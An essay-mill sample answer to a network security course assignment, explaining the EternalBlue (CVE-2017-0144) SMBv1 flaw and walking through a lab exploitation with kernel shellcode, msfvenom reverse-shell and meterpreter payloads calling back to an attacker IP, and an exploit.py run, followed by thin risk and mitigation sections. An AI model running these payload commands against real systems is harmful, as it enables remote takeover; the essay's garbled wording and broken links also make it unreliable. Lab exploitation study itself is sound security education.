country
$20 Bonus + 25% OFF
Securing Higher Grades Costing Your Pocket? Book Your Assignment at The Lowest Price Now!

ITNET302A Advanced Network Security

tag 0 Download9 Pages / 2,018 Words tag Add in library Click this icon and make it bookmark in your library to refer it later. GOT IT
  • Course Code: ITNET302A
  • University: Tafe NSW
  • Country: Australia

Question:

Some key points to consider including in your paper are:

? Explanation of the vulnerability

? Explanation and demonstration of the EternalBlue exploit

Include screenshots of network discovery, exploitation setup, exploitation success, and from your shell print the text file located

? Risk assessment (including risk calculation) of the EternalBlue exploit to Files'R'Us

? Theoretical explanation on the scope of the domain that would be impacted in the case of exploitation

 

Amswer:

Introduction

Stylized as ETERNALBLUE at times, Eternalblue is an exploit developed by American NSA, this is according to testimony by former employees of NSA. Shadow Brokers hacker group leaked it on 14th April, 2017, and was utilized on 12th May, 2017 as part of the international WannaCry ransom ware attack (Kao, and Hsiao, 2018).  EternalBlue is remote code execution vulnerability occurs in the way that the SMBv1 server takes particular requests. If the attacker effectively exploits the vulnerability can gain the capability to execute code on the server which is targeted. In most situations to be able to exploit the vulnerability, unauthenticated attacker can send a particularly crafted packet to SMBv1 server that is targeted. The vulnerability is addresses by security update the by adjusting how SMBv1 takes these particularly crafted requests. Microsoft's implementation of the SBM which means Server Message Block protocol vulnerability is targeted by EternalBlue exploits. The exposure is symbolized by  CVE-2017-0144  in the Common Vulnerability and Exposures which is symbolized as CVE  catalog. This vulnerability happens since the SMB version 1 (SMBv1) server in different versions of  the Microsoft Windows mismanages particularly developed packets from attackers remotely, authorizing them to implement the arbitrary code on the aimed machine.

 

Demonstration of the EternalBlue exploit

 In this segment of the paper, will demonstrate the process of EternalBlue exploit by use of the metaspoilt tool. This tool aids offers information about security vulnerability and consequently aids in penetration testing and development of IDS signature (Dwyer,  2018). The paper analyses EternalBlue exploit and write this step-by-step on how the exploit works on the identified target. To start with we must have both the target machine and the attacker machine.

  1. Windows Server 2012 R2 - Victim Machine

It is not necessary to make any changes after installation of the OS. This helps to get the IP address and know whether the targeted computer is ON during attacking process.

  1. GNU/Linux  – Attacker Machine

One can use any operating system as long he or she is has a vast knowledge of these tools:

  • Python v2.7
  • NASM
  • Metasploit Framework

For the purpose of this paper the following will be the require lab configurations

Attacker – IP: 10.0.2.6 Linux/ GNU Debian x64

Target - IP: 10.0.2.12 –Windows Server 2012 R2 x64

After setting up the lab the first set for the EternalBlue exploit will involve assembling the kernel shellcode which is developed for EternalBlue exploit. Towards the end of the attack an userland shellcode will be added to it, this will be what Metaspoilt payload need to execute on the victim machine.  A shellcode developed by sleepya can be obtained from: www:gist.github.com/worawit/05105fce9e126ac9c85325f0b05d6501#file-eternalblue_x64_kshellcode-asm

The .asm file is saved after being downloaded from the link above followed by use of NASM in order to assemble using the following command: nasm -f bin kernel_shell_x64.asm.

After assembling it, this is followed by generation of userland shellcode, which is a payload with msfvenom. The msfvenom is will be utilized for generation of payload. This demonstration will first, reverse shell via TCP followed by a meterpreter session. Separetley both payloads can be generate as follows:

  1. windows/x64/shell/reverse_tcp
  2. msfvenom -p windows/x64/shell/reverse_tcp -f raw -o shell_msf.bin EXITFUNC=thread LHOST=[ATTACKER_IP] LPORT=4444

For: windows/x64/meterpreter/reverse_tcp:

For: msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -o meterpreter_msf.bin EXITFUNC=thread LHOST=[ATTACKER_IP] LPORT=4444

Hence, one will be required to join userland shellcode + kernel shellcode. After assembling the shellcode and generation of Metasploit’s payloads that are needed, it will be essential to concatenate them.

 


Thus, shell/reverse_tcp e + kernel shellcod

Then, kernel meterpreter/reverse_tcp + shellcode:

Completion of these two steps, two payloads of distinct attacks can be obtained set to be used. In order to get a reverse shell it will make one utilize sleepya’s exploit,  can be obtained from the link below: www.gist.github.com/worawit/074a27e90a3686506fc586249934a30ne.

This will present two distinct approach to impact successfully on the victim machine.  This will be done over “Guest” account. This guest account becomes quiet by default in Windows Server 2012 R2. Nonetheless, if the account can be activate by the network administrator, one can exploit it and get the system shell of the targeted machine. The main step will involve using any text editor to open any exploit.py and indicate that it will be the account which will be used to authenticate. In the attacker machine this will be saved as a.py extension. Before continuing with this, in order to get the reverse shellcode linking in the instant it will be executed in the victim device it will be necessary to setup Metaspoilt exploit.

Lines 42 and 43 in the above can defined the said information. These change saved, one can continue with execution of the exploit with these parameter: python exploit.py <ip_target> reverse_shell.bin 500. The 500 parameter correspond to “numGroomConn”. Modifying the extent of “Groom” connections aid in reaching adjoining pool memory of the kernel in order the buffer overwrites ends in the location needed and accomplishing the execution appropriately the shellcode. In the case of userland shellcode one can use 500 “groom” connection number. If at effect one does not get the inverse linking, hence one can further increase this number.

This in Metaspoilt terminal it will receive the reverse shell.

Via user or pass account. Another approach to receive a successful exploit is utilizing which were earlier attained from local user account. Just like in the prior “Guest” user case, this does not put into consideration the rights of the account one authenticate with, the system will be the received terminal. Here one can edit the exploit.py for addition of  the information from the user account.

 

Likewise save and implement the exploit.

This will give the same outcome

From here one can configure Metaspoilt to receive the reverse connection, before obtaining a meterpreter session with administrator privileges.

The exploit can be executed utilizing the parameters “python exploit.py <ip_target> meterpreter.bin 200”. In this case one can note the reduction of Groom’s connection to 200. The value can be increade if the exploit is execute correctly but the session is not received.

On the Metasploit’s terminal on will immediately get the meterpreter’s session.

Risk assessment of the EternalBlue exploit to Files'R'Us

Risk is the likelihood of loss. For example, the risk of a computer shutting down. A risk assessment is calculating the likelihood of loss and its impact Phomkeona, et. al  2017. It needs to take into consideration both IT and business considerations. Therefore, there has to be business justifications for the implementation of mitigations. This is justified through the risk, or impact of loss, of what you are protecting. Risk is calculated by threat multiplied by vulnerability

Risk = Threat x Vulnerability

A high threat with a high vulnerability carries a high risk. For example not installing antivirus on the receptionist’s computer’. However, anything multiplied by zero is zero. A high threat with a low vulnerability can carry a low risk.

Scope of the domain that would be impacted in the case of exploitation

Exploitation encompasses global culture in the digital age. The demonstration of breaking into a secure networks serves some needs, from corporate reconnaissance to political insurbonation and blatant theft. These exploitation influences associations in a number of ways - some all-inclusive, others particular to the idea of the explanation behind exploitation and the business being referred to. The direction of exploitation whether a company get exploits or gets exploited additionally has an impact.

Exploitation has a substantial effect. Sensitive data is stolen, referred as an "Information Breach". Different records are compromised. Computers are transformed into DDoS hubs, attack relays, spammer, and more (Shao, et al  2017). Execution slow back to a creep. Data transfer capacity is disabled by the tremendous measure of unlawful movement flooding through the computers. Each contact found is spammed with additional exploit effort. Website pages are ruined. The domain ends up being blacklisted for manhandling. Everybody involved needs to be concerned about data fraud. Individual reputation is directly impacted. Rather than focusing on development and sales, staff members are concerned about harm control.

Immediate remediation actions

Having awareness of the perils is the initial move towards protection from both being exploited, and from dealing with the aftermath on the off chance that it happens  (Nakashima, & Timberg,  2017). There are safeguard steps that can be taken for better security namely:

  • Physical security - Placing locks on doors
  • Operational security - Don’t have a green arrow pointing to the server room
  • Documentation - Document how systems talk to each other
  • Disaster plan - When it hits the fan, what’s the plan?

Preventative measures and mitigations for EternalBlue exploit impacts.

  This paper will look five measures and mitigation practices that can be taken to minimize the impacts of EternalBlue exploit in future. These steps comprises the following:

Follow the Least Privilege Principle: configuration of access controls is necessary and consists netwok and directory sharing permission with the least right. Admin privilages is not needed by most users do undertake the required tasks on organization endpoint users, user access should be minimum to allow standard functioning.

 Apply Patches any Disable SMB v1: in order to shield against the particular EternalBlue straining, one should simply apply the patch MS17-010 that Microsoft released a few months ago or disable the out of dated Microsoft SMB protocol version 1.

Always Backup: backing up important data is an vital, table-stakes best practice whenever one is attacked by a new extic EternalBlue attack or the hard drive dies unexpectedly.

Block Internet Access: Individual networks should not be open to SMB packets from internet since Microsoft SMB protocol is developed to be internal.

Apply Application Control: Regulation of executables that have access to th files system can as well contribute to defensive mechanism.

 

Conclusion

Recently, cyber exploitaion has set up a reputation of something more than mere cyber activity. The repercussions of these demonstrations are regularly extreme; running from an extraordinary monetary misfortune to breaks of sensitive military data. Accordingly, there is a developing far reaching concern about the answer for this issue.

Then again, the majority of the general population are not comfortable with the points of interest encompassing these events. For them, espionage or cyber exploitation may sound like the same, if not the same, to cyber-attack. Despite how comparable they may be, this paper has shown has analyzed EternalBlue exploit. The most well-known is by how the exploits communicates to the vulnerable application. An exploit remotely operates over a network and exploit the security vulnerability with no earlier access to the vulnerable framework.

 

References

Akkas, A., Chachamis, C.N. and Fetahu, L., 2017. Malware Analysis of WanaCry Ransomware.

Dwyer, A., 2018. The NHS cyber-attack: A look at the complex environmental conditions of WannaCry.

Kao, D.Y. and Hsiao, S.C., 2018, February. The dynamic analysis of WannaCry ransomware. In Advanced Communication Technology (ICACT), 2018 20th International Conference on (pp. 159-166). IEEE.

Nakashima, E. and Timberg, C., 2017. NSA officials worried about the day its potent hacking tool would get loose. Then it did. Washington Post,[Online]. Available: https://www. washingtonpost. com/business/technology/nsa-officials-worried-about-the-day-its-potent-hacking-tool-would-get-loosethen-it-did/2017/05/16/50670b16-3978-11e7-a058-ddbb23c75d82_story. html.

Phomkeona, S., Okamura, K., Edwards, K. and Ban, Y., 2017. Zero-day Malicious Email Behavior Investigation and Analysis. Proceedings of the Asia-Pacific Advanced Network, 44, pp.8-12.

Shao, S., Tunc, C., Satam, P. and Hariri, S., 2017, September. Real-Time IRC Threat Detection Framework. In Foundations and Applications of Self* Systems (FAS* W), 2017 IEEE 2nd International Workshops on (pp. 318-323). IEEE.

Download Sample

Get 100% money back after download, simply upload your unique content* of similar no. of pages or more. We verify your content and once successfully verified 100% value credited to your wallet within 7 days.

Upload Unique Document

Document Under Evaluation

Get Credits into Your Wallet

*The content must not be available online or in our existing Database to qualify as unique.

Cite This Work

To export a reference to this article please select a referencing stye below:

My Assignment Help. (2020). Advanced Network Security. Retrieved from https://myassignmenthelp.com/free-samples/itnet302a-advanced-network-security.

"Advanced Network Security." My Assignment Help, 2020, https://myassignmenthelp.com/free-samples/itnet302a-advanced-network-security.

My Assignment Help (2020) Advanced Network Security [Online]. Available from: https://myassignmenthelp.com/free-samples/itnet302a-advanced-network-security
[Accessed 05 August 2020].

My Assignment Help. 'Advanced Network Security' (My Assignment Help, 2020) <https://myassignmenthelp.com/free-samples/itnet302a-advanced-network-security> accessed 05 August 2020.

My Assignment Help. Advanced Network Security [Internet]. My Assignment Help. 2020 [cited 05 August 2020]. Available from: https://myassignmenthelp.com/free-samples/itnet302a-advanced-network-security.


Dissertations often become fearful to complete if the deadlines are tight and your entire writing part is left. There are many things to follow like presenting the facts and information. Writing abstracts, methods and discussions and creating the entire bibliography need tiresome hours. Even after that your paper may get rejected owing to plagiarism, not following the conventions of writing and others. Since you cant take chances, the best option is to hire our tested experts at Myassignmenthelp.com. They have over 10+ years of experience in providing excellent approval worthy dissertation.

Latest Management Samples

CLAW2201 Corporations Law For The Royal British Bank Vs. Turquand

Download : 0 | Pages : 9
  • Course Code: CLAW2201
  • University: The University Of Sydney
  • Country: Australia

Answer: Introduction Corporations are guided by the principle of separate legal entity developed in the celebrated decision in the case of Salomon vs. Salomon. There is a veil that is created upon incorporation that separates the company from its members and directors. One of the advantages derived from incorporation is that corporations are capable of entering into valid contracts in their own name as well as being capable of suing and being s...

Read More arrow

BUSM4052 Applied Entrepreneurship

Download : 0 | Pages : 3
  • Course Code: BUSM4052
  • University: Royal Melbourne Institute Of Technology
  • Country: Australia

Answer: Business Model     Problem :     The report deals with the validation of the cyber security learning platforms using the business model. The main idea behind the report is to approach the dangers and the risks of the internet facilities in the everyday lives of the individuals. In the modern generation, the people who use the online websites and are frequent in surfing the internet, are pro...

Read More arrow Tags: Australia Arlington Management University of New South Wales 

AMN465 Public Relations Management

Download : 0 | Pages : 11
  • Course Code: AMN465
  • University: Queensland University Of Technology
  • Country: Australia

Answer: Overview The month of June witnessed an environmental approval for a mine which is planned to be developed in Carmichael by the Adani group (Adani.com ,2019). The Adani Group in June passed its final environmental approval and is now permitted to begin the work in the mine in Central Queensland after around eight to nine years of planning and political debate over the scenario (Abc.net ,2019). Hence, the main focus of this essay ...

Read More arrow Tags: Australia 9 Public Relations Queensland University of Technology 

ECOM4000 Principles Of Economics For Total Quantity Of Goods Produced

Download : 0 | Pages : 5

Answer: 1) Economies of Scale signify cost advantage arising with rising output of the commodity. It arises owing to inverse relation between the total quantity of goods produced and fixed cost per unit (Bauer 2014).  It describes that large companies have competitive advantage over the smaller companies, which means that larger business have lower business cost.  It is usually classified into types- internal and external. Internal eco...

Read More arrow Tags: Australia Ferny Hills Management UNCC100 Our World: Community and Vulnerability University of New South Wales 

BUSM4411 Project Initiation Management

Download : 0 | Pages : 13
  • Course Code: BUSM4411
  • University: Royal Melbourne Institute Of Technology
  • Country: Australia

Answer: As stated by Chen (2015), different kinds of projects had become an integral part of the contemporary business landscape and it is seen that the diverse corporations are increasingly taking up various projects for the enhancement of their profitability. Harris et al. (2018) are of the viewpoint that the framework of projects becomes more important in the particular context of the construction, energy and other sectors rather than the b...

Read More arrow Tags: Australia 9 Project intiation Management Other 
Next
watch

Save Time & improve Grade

Just share Requriment and get customize Solution.

question
We will use e-mail only for:

arrow Communication regarding your orders

arrow To send you invoices, and other billing info

arrow To provide you with information of offers and other benefits

1,377,905

Orders

4.9/5

Overall Rating

5,085

Experts

Our Amazing Features

delivery

On Time Delivery

Our writers make sure that all orders are submitted, prior to the deadline.

work

Plagiarism Free Work

Using reliable plagiarism detection software, Turnitin.com.We only provide customized 100 percent original papers.

time

24 X 7 Live Help

Feel free to contact our assignment writing services any time via phone, email or live chat.

subject

Services For All Subjects

Our writers can provide you professional writing assistance on any subject at any level.

price

Best Price Guarantee

Our best price guarantee ensures that the features we offer cannot be matched by any of the competitors.

Our Experts

Assignment writing guide
student rating student rating student rating student rating student rating 5/5

2109 Order Completed

99% Response Time

Emma Zhong

Ph.D in Project Management with Specialization in Project Communications Management

Singapore, Singapore

Hire Me
Assignment writing guide
student rating student rating student rating student rating student rating 5/5

798 Order Completed

97% Response Time

Benjamin Blakeman

MSc in Medical Technology

London, United Kingdom

Hire Me
Assignment writing guide
student rating student rating student rating student rating student rating 5/5

1265 Order Completed

97% Response Time

James Cook

Masters in Management

Wellington, New Zealand

Hire Me
Assignment writing guide
student rating student rating student rating student rating student rating 5/5

2115 Order Completed

97% Response Time

Kimberley Chen

MPA in Accounting

Singapore, Singapore

Hire Me

FREE Tools

plagiarism

Plagiarism Checker

Get all your documents checked for plagiarism or duplicacy with us.

essay

Essay Typer

Get different kinds of essays typed in minutes with clicks.

edit

GPA Calculator

Calculate your semester grades and cumulative GPa with our GPA Calculator.

referencing

Chemical Equation Balancer

Balance any chemical equation in minutes just by entering the formula.

calculator

Word Counter & Page Calculator

Calculate the number of words and number of pages of all your academic documents.

Refer Just 5 Friends to Earn More than $2000

Check your estimated earning as per your ability

1

1

1

Your Approx Earning

Live Review

Our Mission Client Satisfaction

Awesome work. Awesome response time. Very thorough & clear. Love the results I get with MAH!

flag

User Id: 383727 - 31 Jul 2020

Australia

student rating student rating student rating student rating student rating

Work was done in a timely manner took it through grammarly checked for plagiarism very well satisfied

flag

User Id: 463334 - 31 Jul 2020

Australia

student rating student rating student rating student rating student rating

Great work for the short notice given. Thank you for never disappointing and helping out.

flag

User Id: 194216 - 31 Jul 2020

Australia

student rating student rating student rating student rating student rating

I received a full point on the assignment. Thank you for all the help with the assignment.

flag

User Id: 411395 - 31 Jul 2020

Australia

student rating student rating student rating student rating student rating
callback request mobile
Have any Query?